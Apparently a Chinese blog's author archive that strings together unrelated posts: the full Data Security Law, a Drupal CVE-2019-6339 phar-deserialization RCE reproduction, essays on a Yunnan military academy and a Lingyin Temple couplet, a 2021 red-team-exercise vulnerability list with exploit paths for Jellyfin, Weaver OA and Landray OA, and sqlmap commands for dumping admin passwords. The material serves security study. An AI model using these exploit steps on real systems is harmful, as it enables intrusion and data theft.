作者归档:一个有身份的土豆

中华人民共和国数据安全法

中华人民共和国数据安全法(2021年6月10日第十三届全国人民代表大会常务委员会第二十九次会议通过)

目录

第一章 总则

第二章 数据安全与发展

第三章 数据安全制度

第四章 数据安全保护义务

第五章 政务数据安全与开放

第六章 法律责任

第七章 附则

第一章 总则

第一条 为了规范数据处理活动,保障数据安全,促进数据开发利用,保护个人、组织的合法权益,维护国家主权、安全和发展利益,制定本法。

第二条 在中华人民共和国境内开展数据处理活动及其安全监管,适用本法。在中华人民共和国境外开展数据处理活动,损害中华人民共和国国家安全、公共利益或者公民、组织合法权益的,依法追究法律责任。

第三条 本法所称数据,是指任何以电子或者其他方式对信息的记录。数据处理,包括数据的收集、存储、使用、加工、传输、提供、公开等。数据安全,是指通过采取必要措施,确保数据处于有效保护和合法利用的状态,以及具备保障持续安全状态的能力。

第四条 维护数据安全,应当坚持总体国家安全观,建立健全数据安全治理体系,提高数据安全保障能力。

第五条 中央国家安全领导机构负责国家数据安全工作的决策和议事协调,研究制定、指导实施国家数据安全战略和有关重大方针政策,统筹协调国家数据安全的重大事项和重要工作,建立国家数据安全工作协调机制。

第六条 各地区、各部门对本地区、本部门工作中收集和产生的数据及数据安全负责。工业、电信、交通、金融、自然资源、卫生健康、教育、科技等主管部门承担本行业、本领域数据安全监管职责。公安机关、国家安全机关等依照本法和有关法律、行政法规的规定,在各自职责范围内承担数据安全监管职责。国家网信部门依照本法和有关法律、行政法规的规定,负责统筹协调网络数据安全和相关监管工作。

第七条 国家保护个人、组织与数据有关的权益,鼓励数据依法合理有效利用,保障数据依法有序自由流动,促进以数据为关键要素的数字经济发展。

第八条 开展数据处理活动,应当遵守法律、法规,尊重社会公德和伦理,遵守商业道德和职业道德,诚实守信,履行数据安全保护义务,承担社会责任,不得危害国家安全、公共利益,不得损害个人、组织的合法权益。

第九条 国家支持开展数据安全知识宣传普及,提高全社会的数据安全保护意识和水平,推动有关部门、行业组织、科研机构、企业、个人等共同参与数据安全保护工作,形成全社会共同维护数据安全和促进发展的良好环境。

第十条 相关行业组织按照章程,依法制定数据安全行为规范和团体标准,加强行业自律,指导会员加强数据安全保护,提高数据安全保护水平,促进行业健康发展。

第十一条 国家积极开展数据安全治理、数据开发利用等领域的国际交流与合作,参与数据安全相关国际规则和标准的制定,促进数据跨境安全、自由流动。

第十二条 任何个人、组织都有权对违反本法规定的行为向有关主管部门投诉、举报。收到投诉、举报的部门应当及时依法处理。有关主管部门应当对投诉、举报人的相关信息予以保密,保护投诉、举报人的合法权益。

第二章 数据安全与发展

第十三条 国家统筹发展和安全,坚持以数据开发利用和产业发展促进数据安全,以数据安全保障数据开发利用和产业发展。

第十四条 国家实施大数据战略,推进数据基础设施建设,鼓励和支持数据在各行业、各领域的创新应用。省级以上人民政府应当将数字经济发展纳入本级国民经济和社会发展规划,并根据需要制定数字经济发展规划。

第十五条 国家支持开发利用数据提升公共服务的智能化水平。提供智能化公共服务,应当充分考虑老年人、残疾人的需求,避免对老年人、残疾人的日常生活造成障碍。

第十六条 国家支持数据开发利用和数据安全技术研究,鼓励数据开发利用和数据安全等领域的技术推广和商业创新,培育、发展数据开发利用和数据安全产品、产业体系。

第十七条 国家推进数据开发利用技术和数据安全标准体系建设。国务院标准化行政主管部门和国务院有关部门根据各自的职责,组织制定并适时修订有关数据开发利用技术、产品和数据安全相关标准。国家支持企业、社会团体和教育、科研机构等参与标准制定。

第十八条 国家促进数据安全检测评估、认证等服务的发展,支持数据安全检测评估、认证等专业机构依法开展服务活动。国家支持有关部门、行业组织、企业、教育和科研机构、有关专业机构等在数据安全风险评估、防范、处置等方面开展协作。

第十九条 国家建立健全数据交易管理制度,规范数据交易行为,培育数据交易市场。

第二十条 国家支持教育、科研机构和企业等开展数据开发利用技术和数据安全相关教育和培训,采取多种方式培养数据开发利用技术和数据安全专业人才,促进人才交流。

第三章 数据安全制度

第二十一条 国家建立数据分类分级保护制度,根据数据在经济社会发展中的重要程度,以及一旦遭到篡改、破坏、泄露或者非法获取、非法利用,对国家安全、公共利益或者个人、组织合法权益造成的危害程度,对数据实行分类分级保护。国家数据安全工作协调机制统筹协调有关部门制定重要数据目录,加强对重要数据的保护。关系国家安全、国民经济命脉、重要民生、重大公共利益等数据属于国家核心数据,实行更加严格的管理制度。各地区、各部门应当按照数据分类分级保护制度,确定本地区、本部门以及相关行业、领域的重要数据具体目录,对列入目录的数据进行重点保护。

第二十二条 国家建立集中统一、高效权威的数据安全风险评估、报告、信息共享、监测预警机制。国家数据安全工作协调机制统筹协调有关部门加强数据安全风险信息的获取、分析、研判、预警工作。

第二十三条 国家建立数据安全应急处置机制。发生数据安全事件,有关主管部门应当依法启动应急预案,采取相应的应急处置措施,防止危害扩大,消除安全隐患,并及时向社会发布与公众有关的警示信息。

第二十四条 国家建立数据安全审查制度,对影响或者可能影响国家安全的数据处理活动进行国家安全审查。依法作出的安全审查决定为最终决定。

第二十五条 国家对与维护国家安全和利益、履行国际义务相关的属于管制物项的数据依法实施出口管制。

第二十六条 任何国家或者地区在与数据和数据开发利用技术等有关的投资、贸易等方面对中华人民共和国采取歧视性的禁止、限制或者其他类似措施的,中华人民共和国可以根据实际情况对该国家或者地区对等采取措施。

第四章 数据安全保护义务

第二十七条 开展数据处理活动应当依照法律、法规的规定,建立健全全流程数据安全管理制度,组织开展数据安全教育培训,采取相应的技术措施和其他必要措施,保障数据安全。利用互联网等信息网络开展数据处理活动,应当在网络安全等级保护制度的基础上,履行上述数据安全保护义务。重要数据的处理者应当明确数据安全负责人和管理机构,落实数据安全保护责任。

第二十八条 开展数据处理活动以及研究开发数据新技术,应当有利于促进经济社会发展,增进人民福祉,符合社会公德和伦理。

第二十九条 开展数据处理活动应当加强风险监测,发现数据安全缺陷、漏洞等风险时,应当立即采取补救措施;发生数据安全事件时,应当立即采取处置措施,按照规定及时告知用户并向有关主管部门报告。

第三十条 重要数据的处理者应当按照规定对其数据处理活动定期开展风险评估,并向有关主管部门报送风险评估报告。风险评估报告应当包括处理的重要数据的种类、数量,开展数据处理活动的情况,面临的数据安全风险及其应对措施等。

第三十一条 关键信息基础设施的运营者在中华人民共和国境内运营中收集和产生的重要数据的出境安全管理,适用《中华人民共和国网络安全法》的规定;其他数据处理者在中华人民共和国境内运营中收集和产生的重要数据的出境安全管理办法,由国家网信部门会同国务院有关部门制定。

第三十二条 任何组织、个人收集数据,应当采取合法、正当的方式,不得窃取或者以其他非法方式获取数据。法律、行政法规对收集、使用数据的目的、范围有规定的,应当在法律、行政法规规定的目的和范围内收集、使用数据。

第三十三条 从事数据交易中介服务的机构提供服务,应当要求数据提供方说明数据来源,审核交易双方的身份,并留存审核、交易记录。

第三十四条 法律、行政法规规定提供数据处理相关服务应当取得行政许可的,服务提供者应当依法取得许可。

第三十五条 公安机关、国家安全机关因依法维护国家安全或者侦查犯罪的需要调取数据,应当按照国家有关规定,经过严格的批准手续,依法进行,有关组织、个人应当予以配合。

第三十六条 中华人民共和国主管机关根据有关法律和中华人民共和国缔结或者参加的国际条约、协定,或者按照平等互惠原则,处理外国司法或者执法机构关于提供数据的请求。非经中华人民共和国主管机关批准,境内的组织、个人不得向外国司法或者执法机构提供存储于中华人民共和国境内的数据。

第五章 政务数据安全与开放

第三十七条 国家大力推进电子政务建设,提高政务数据的科学性、准确性、时效性,提升运用数据服务经济社会发展的能力。

第三十八条 国家机关为履行法定职责的需要收集、使用数据,应当在其履行法定职责的范围内依照法律、行政法规规定的条件和程序进行;对在履行职责中知悉的个人隐私、个人信息、商业秘密、保密商务信息等数据应当依法予以保密,不得泄露或者非法向他人提供。

第三十九条 国家机关应当依照法律、行政法规的规定,建立健全数据安全管理制度,落实数据安全保护责任,保障政务数据安全。

第四十条 国家机关委托他人建设、维护电子政务系统,存储、加工政务数据,应当经过严格的批准程序,并应当监督受托方履行相应的数据安全保护义务。受托方应当依照法律、法规的规定和合同约定履行数据安全保护义务,不得擅自留存、使用、泄露或者向他人提供政务数据。

第四十一条 国家机关应当遵循公正、公平、便民的原则,按照规定及时、准确地公开政务数据。依法不予公开的除外。

第四十二条 国家制定政务数据开放目录,构建统一规范、互联互通、安全可控的政务数据开放平台,推动政务数据开放利用。

第四十三条 法律、法规授权的具有管理公共事务职能的组织为履行法定职责开展数据处理活动,适用本章规定。

第六章 法律责任

第四十四条 有关主管部门在履行数据安全监管职责中,发现数据处理活动存在较大安全风险的,可以按照规定的权限和程序对有关组织、个人进行约谈,并要求有关组织、个人采取措施进行整改,消除隐患。

第四十五条 开展数据处理活动的组织、个人不履行本法第二十七条、第二十九条、第三十条规定的数据安全保护义务的,由有关主管部门责令改正,给予警告,可以并处五万元以上五十万元以下罚款,对直接负责的主管人员和其他直接责任人员可以处一万元以上十万元以下罚款;拒不改正或者造成大量数据泄露等严重后果的,处五十万元以上二百万元以下罚款,并可以责令暂停相关业务、停业整顿、吊销相关业务许可证或者吊销营业执照,对直接负责的主管人员和其他直接责任人员处五万元以上二十万元以下罚款。违反国家核心数据管理制度,危害国家主权、安全和发展利益的,由有关主管部门处二百万元以上一千万元以下罚款,并根据情况责令暂停相关业务、停业整顿、吊销相关业务许可证或者吊销营业执照;构成犯罪的,依法追究刑事责任。

第四十六条 违反本法第三十一条规定,向境外提供重要数据的,由有关主管部门责令改正,给予警告,可以并处十万元以上一百万元以下罚款,对直接负责的主管人员和其他直接责任人员可以处一万元以上十万元以下罚款;情节严重的,处一百万元以上一千万元以下罚款,并可以责令暂停相关业务、停业整顿、吊销相关业务许可证或者吊销营业执照,对直接负责的主管人员和其他直接责任人员处十万元以上一百万元以下罚款。

第四十七条 从事数据交易中介服务的机构未履行本法第三十三条规定的义务的,由有关主管部门责令改正,没收违法所得,处违法所得一倍以上十倍以下罚款,没有违法所得或者违法所得不足十万元的,处十万元以上一百万元以下罚款,并可以责令暂停相关业务、停业整顿、吊销相关业务许可证或者吊销营业执照;对直接负责的主管人员和其他直接责任人员处一万元以上十万元以下罚款。

第四十八条 违反本法第三十五条规定,拒不配合数据调取的,由有关主管部门责令改正,给予警告,并处五万元以上五十万元以下罚款,对直接负责的主管人员和其他直接责任人员处一万元以上十万元以下罚款。违反本法第三十六条规定,未经主管机关批准向外国司法或者执法机构提供数据的,由有关主管部门给予警告,可以并处十万元以上一百万元以下罚款,对直接负责的主管人员和其他直接责任人员可以处一万元以上十万元以下罚款;造成严重后果的,处一百万元以上五百万元以下罚款,并可以责令暂停相关业务、停业整顿、吊销相关业务许可证或者吊销营业执照,对直接负责的主管人员和其他直接责任人员处五万元以上五十万元以下罚款。

第四十九条 国家机关不履行本法规定的数据安全保护义务的,对直接负责的主管人员和其他直接责任人员依法给予处分。

第五十条 履行数据安全监管职责的国家工作人员玩忽职守、滥用职权、徇私舞弊的,依法给予处分。

第五十一条 窃取或者以其他非法方式获取数据,开展数据处理活动排除、限制竞争,或者损害个人、组织合法权益的,依照有关法律、行政法规的规定处罚。

第五十二条 违反本法规定,给他人造成损害的,依法承担民事责任。违反本法规定,构成违反治安管理行为的,依法给予治安管理处罚;构成犯罪的,依法追究刑事责任。

第七章 附则

第五十三条 开展涉及国家秘密的数据处理活动,适用《中华人民共和国保守国家秘密法》等法律、行政法规的规定。在统计、档案工作中开展数据处理活动,开展涉及个人信息的数据处理活动,还应当遵守有关法律、行政法规的规定。

第五十四条 军事数据安全保护的办法,由中央军事委员会依据本法另行制定。

第五十五条 本法自2021年9月1日起施行。

来源:新华社

Drupal_远程代码执行漏洞(CVE-2019-6339)

0x01.漏洞介绍
影响软件:Drupal
方式:phar反序列化RCE
效果:任意命令执行

0x03.漏洞复现

使用管理员用户上传头像,头像图片为构造好的 PoC,图片下载

Drupal 的图片默认存储位置为 /sites/default/files/pictures/YYYY-MM/xxx.jpg,默认存储名称为其原来的名称,所以之后在利用漏洞时,可以知道上传后的图片的具体位置

访问 http://xxxxxxx/admin/config/media/file-system,在 Temporary directory 处输入之前上传的图片路径,示例为 phar://./sites/default/files/pictures/2021-06/blog-ZDI-CAN-7232-cat_0.jpg,保存后将触发该漏洞。如下图所示,触发成功

可以编辑图片完成不同命令的执行,下图为修改执行命令的地方。

学习党史之云南陆军讲武堂

晚清编练新军,计划在全国编三十六镇(师),其中第十九镇建于云南。新军编练亟需新型军官,清政府为适应这一新形势的需要,作出统一的规定:“各省应于省垣设立讲武堂一处,为现带兵者研究武学之所。”。

云南于1899年设立陆军武备学堂,这是云南陆军讲武堂的前身。1908年(光绪三十四年),护理云贵总督兼云南藩台沈秉经向清廷奏准,筹办云南陆军讲武堂。校址设在昆明原明朝沐国公练兵处,占地7万余平方米。1909年9月26日,云南陆军讲武堂正式创立并开学,高尔登为首任总办(校长)。学堂开办之初,分步、骑、炮、工四个兵科,设甲、乙、丙三班。课程仿照日本士官学校加以调整而成,分为学科、术科两项。讲武堂聘用了一批国内武备学堂毕业生和日本士官学校中国留学生任教。1911年2月,蔡锷应云贵总督李经羲的邀请,到云南新军第十九镇第三十七协任协统,并兼任云南陆军讲武堂教官。1911年10月10日,辛亥革命胜利的消息使云南的革命党人深受鼓舞,蔡锷、李根源等几次举行秘密会议,决定10月30日晚在昆明发动起义,并推举蔡锷为起义军总司令,李根源为副司令。是晚,以讲武堂学生为骨干的起义军向总督署等要地发动攻击,经过10多个小时的激烈战斗,起义军占领昆明,即通电全省、全国成立中华军都督府。辛亥云南起义的成功,推翻了清朝在云南的统治,支援了武昌起义,推动了辛亥革命在全国范围的胜利。辛亥革命后,云南都督蔡锷将军下令将云南陆军讲武堂改为云南陆军讲武学校。以云南讲武堂师生为骨干组建的滇军,在护国、护法战争中战绩辉煌,故学校声誉日隆,威名远扬。邻省甚至邻国许多有志青年纷纷来昆明报考求学。据不完全统计,从第十一期至第十七期,朝鲜、越南来留学的青年达200余名。1924年,孙中山在广州创办黄埔军校,云南陆军讲武堂应邀援助建校,首批派出教官刘耀扬、叶剑英、林振雄、王柏龄、帅崇兴等人前往任教,分别担任步、骑、炮、工兵四大兵种科长,同时派出一批带枪械的教官协助办学。1928年,蒋介石明令各省不得办军官学校。1930年,龙云在讲武学校成立滇军教导团,龙自兼团长,除步、骑、炮、工四兵科外,增设宪兵、经理、交通三个区队以培养专业军官。教导团共办三期。1935年,云南陆军讲武堂被改编为“中央陆军军官学校昆明分校”,由龙云兼主任。依照黄埔军校系列定为黄埔第十一、十四、十六、十七、十八、十九、二十期,培训各类学员近8000人。抗日战争结束后,1945年9月,第五分校奉令停办。

灵隐寺

灵隐寺内还挂有这样一副对联:“人生哪能多如意,万事只求半称心。”这副对联看似简单通俗,实则写尽了人生真相。对联的点睛之笔在于那个“半”字,众所周知,中国传统文化里有一种智慧叫做“中庸”,这副对联便体现了中庸之道。中庸的解释有很多,通常认为,中庸指“不偏不倚、无过无不及”。这与灵隐寺名联的“半”字内涵相似,我们常说的“过犹不及”、“月满则亏水满则溢”,其实都是强调万事有一个量度,所以人生不会事事称心如意,福祸总是相依。

“半”的智慧在中国文学作品中多有体现,看过《红楼梦》的人基本都会对曹雪芹笔下那副对联印象深刻:“身后有余忘缩手,眼前无路想回头。”人的欲望如果得不到克制,就会酿成恶果,即使你事后悔恨也来不及挽救。唯有时刻注意一个度,才能保住平安。与这副对联思想相似的,还有清代学者李密庵的《半半歌》。《半半歌》曾经被著名学者林语堂引用,很多句子读完都令人深思,比如“一半还之天地,让将一半人间”,“心情半佛半神仙,姓字半藏半显”。这首歌是中庸智慧的集中体现,感兴趣者可以去读读全文。“万事只求半称心”,福一半,祸一半,人生就是福与祸的轮回,没有谁的路会一直平坦无风无浪。你只看到悲苦,自然无法放宽心胸,只看到快乐,必然无法警醒自身。灵隐寺对联暗藏的中庸智慧,可以点醒多少被欲望贪求所惑的世人!

2021HVV

确认漏洞

漏洞编号:B-T-V-0001

漏洞名称:帆软v8-v9 getshell

涉及厂商:帆软

可信度:100%

发布日期:2021.4.8

漏洞等级:高危

影响版本:帆软v8.0-v9.0

发现时间:2020.11.3

是否公开:是

信息来源:互联网

关键判断点:/webroot/reportserver

厂商状态说明:厂商于补天平台确认并修复漏洞

漏洞编号:B-T-V-0002

漏洞名称:jellyfin任意文件读取

涉及厂商:jellyfin

可信度:100%

发布日期:2021.3.23

漏洞等级:高危

影响版本:jellyfin<=10.7.0

发现时间:2021.4.8

是否公开:是

信息来源:互联网

关键判断点:/Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/

厂商状态说明:未说明

漏洞编号:B-T-V-0005

漏洞名称:帆软报表系统v9 getshell

涉及厂商:帆软

漏洞等级:高危漏洞

关注点:/webroot/reportserver

可信度:90%

是否公开:是

是否有POC:是

首次发现时间:2021.4.8

情报来源:互联网

漏洞编号:B-T-V-0012

漏洞名称:和信创天云桌面系统命令执行,文件上传 全版本 前台 默认配置

涉及厂商:北京和信创天科技有限公司

可信度:80%

发布日期:2021.4.8

漏洞等级:高危

影响版本:暂无版本信息

发现时间:2021.4.8

是否公开:是

信息来源:互联网关

键判断点:/Upload/upload_file.php

厂商状态说明:未说明

漏洞编号:B-T-V-0032

漏洞名称:泛微OA9 前台无限制Getshell

涉及厂商:泛微

漏洞等级:高危漏洞

关注点:/page/exportImport/uploadOperation.jsp

可信度:90%

是否公开:是

是否有POC:有

首次发现时间:2021.4.8

情报来源:互联网

漏洞编号:B-T-V-0033

漏洞名称:泛微OA8 前台SQL注入

涉及厂商:泛微漏洞

等级:高危漏洞

关注点:/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=

可信度:90%

是否公开:是

是否有POC:有

首次发现时间:2021.4.8

情报来源:互联网防护建议:更新天眼规则升级包到最新版本3.0.0408.12735可检测

持续监测漏洞

漏洞编号:B-T-V-0008

漏洞名称:DzzOffice 远程代码执行漏洞

漏洞等级:高危

可信度:10%

是否公开:否

是否有POC:无

首次发现时间:2021.4.8

报来源:互联网

漏洞编号:B-T-V-0010

漏洞名称: jeecms前台无条件RCE

涉及厂商:jeecms

漏洞等级:高危

可信度:80%

是否公开:否

是否有POC:无

首次发现时间:2021.4.8

情报来源:互联网

漏洞编号:B-T-V-0011

漏洞名称:金蝶k3Coud命令执行

涉及厂商:金蝶漏洞

等级:高危可信度:10%

是否公开:否

是否有POC:无

首次发现时间:2021.4.8

情报来源:互联网

漏洞编号:B-T-V-0013

漏洞名称:用友U8cloud命令执行

涉及厂商:用友

漏洞等级:高危

可信度:10%

是否公开:否

是否有POC:无

首次发现时间:2021.4.8

情报来源:互联网

漏洞编号:B-T-V-0014

漏洞名称:h3c云计算管理平台任意账户添加

涉及厂商:华三

漏洞等级:高危

可信度:10%

是否公开:否

是否有POC:无

首次发现时间:2021.4.8

情报来源:互联网

漏洞编号:B-T-V-0015

漏洞名称:红帆OA任意文件写入

涉及厂商:红帆漏洞

等级:高危

可信度:10%

是否公开:否

是否有POC:无

首次发现时间:2021.4.8

情报来源:互联网

漏洞编号:B-T-V-0016

漏洞名称:深信服vpn 2021年4月版本无添加rce

涉及厂商:深信服

漏洞等级:高危

可信度:10%

是否公开:否

是否有POC:无

漏洞编号:B-T-V-0018

漏洞名称:致远oa任意文件上传

涉及厂商:致远

漏洞等级:高危

可信度:10%

是否公开:否

是否有POC:无

首次发现时间:2021.4.8

情报来源:互联网

漏洞编号:B-T-V-0019

漏洞名称:h3c交换机任意用户登录

涉及厂商:新华三漏洞

等级:高危

可信度:10%

是否公开:否

是否有POC:无

首次发现时间:2021.4.8

情报来源:互联网

漏洞编号:B-T-V-0020

漏洞名称:WPS-0day-RCE

涉及厂商:WPS

漏洞等级:高危

可信度:10%

是否公开:否

是否有POC:否

首次发现时间:2021.4.8

情报来源:互联网

漏洞编号:B-T-V-0021

漏洞名称:AVTECH 未授权信息泄露漏洞

涉及厂商:AVTECH

漏洞等级:高危可信度:10%

是否公开:否

是否有POC:无

首次发现时间:2021.4.8

情报来源:互联网

漏洞编号:B-T-V-0022

漏洞名称:深信服vpn某版本存在命令执行,任意加管理员

涉及厂商:深信服漏洞等级:高危

可信度:10%

是否公开: 否

是否有POC: 无

首次发现时间:2021.4.8

情报来源:互联网

漏洞编号:B-T-V-0023

漏洞名称:tomcat某版本存在反序列化命令执行

涉及厂商:tomcat

漏洞等级:高危

可信度:10%

是否公开:否

是否有POC:无情报

来源:互联网

漏洞编号:B-T-V-0024

漏洞名称:coremail某版本存在命令执行

涉及厂商:论客科技

漏洞等级:高危

可信度:10%

是否公开:否

是否有POC:无

情报来源:互联网

漏洞编号:B-T-V-0025

漏洞名称:齐治堡垒机某版本命令执行

涉及厂商:齐治

漏洞等级:高危

可信度:10%

是否公开:否

是否有POC:无情报

来源:互联网

漏洞编号:B-T-V-0026

漏洞名称:深信服EDR系统存在命令执行

涉及厂商:深信服

漏洞等级:高危

可信度:10%

是否公开: 否

是否有POC:无情报

来源:互联网

漏洞编号:B-T-V-0027

漏洞名称:用友NC某版本存在反序列化命令执行

涉及厂商:用友

漏洞等级:高危

可信度:10%

是否公开: 否

是否有POC:无

情报来源:互联网

漏洞编号:B-T-V-0028

漏洞名称:Dubbo某版本存在反序列化命令执行

涉及厂商:Apache

漏洞等级:高危

可信度:10%

是否公开: 否

是否有POC:无

情报来源:互联网

漏洞编号:B-T-V-0029

漏洞名称:weblogic某版本存在反序列化命令执行

涉及厂商:Oracle漏洞

等级:高危

可信度:10%

是否公开: 否

是否有POC:无情报

来源:互联网

漏洞编号:B-T-V-0030

漏洞名称:蓝凌OA任意写入漏洞

涉及厂商:蓝凌

漏洞等级:高危

漏洞关注点:/sys/search/sys_search_main/sysSearchMain.do?method=editParam&fdParemNames=11&FdParameters=[shellcode]

可信度:90%

是否公开:是

是否有POC:是

首次发现时间:2021.4.8

情报来源:互联网

漏洞编号:B-T-V-0031

漏洞名称:启明星辰天清汉马UsG防火墙存在逻辑缺陷漏洞

涉及厂商:启明星辰

漏洞等级:高危

可信度:10%

是否公开:否

是否有POC:无

情报来源:互联网

漏洞编号:B-T-V-0035

漏洞名称:Apache Solr任意文件读取漏洞

涉及厂商:Apache

漏洞等级:高危

可信度:10%

是否公开:否

是否有POC:否

首次发现时间:2021.4.8

情报来源:互联网

SQLMAP用法

检查注入点:
sqlmap -u http://aa.com/star_photo.php?artist_id=11

爆所有数据库信息:
sqlmap -u http://aa.com/star_photo.php?artist_id=11 –dbs

爆当前数据库信息:
sqlmap -u http://aa.com/star_photo.php?artist_id=11 –current-db

指定库名列出所有表
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 –tables

‘vhost48330’ 为指定数据库名称

指定库名表名列出所有字段
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 -T admin –columns
‘admin’ 为指定表名称

指定库名表名字段dump出指定字段
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password –dump
‘ac,id,password’ 为指定字段名称